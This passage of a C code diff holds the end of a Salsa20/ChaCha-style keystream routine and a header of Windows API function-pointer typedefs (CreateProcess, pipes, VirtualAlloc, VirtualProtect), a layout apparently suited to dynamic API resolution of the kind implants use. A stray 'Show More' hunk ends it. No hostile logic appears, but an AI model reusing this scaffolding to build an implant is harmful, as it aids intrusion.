+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}
@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .6.2
 .6.6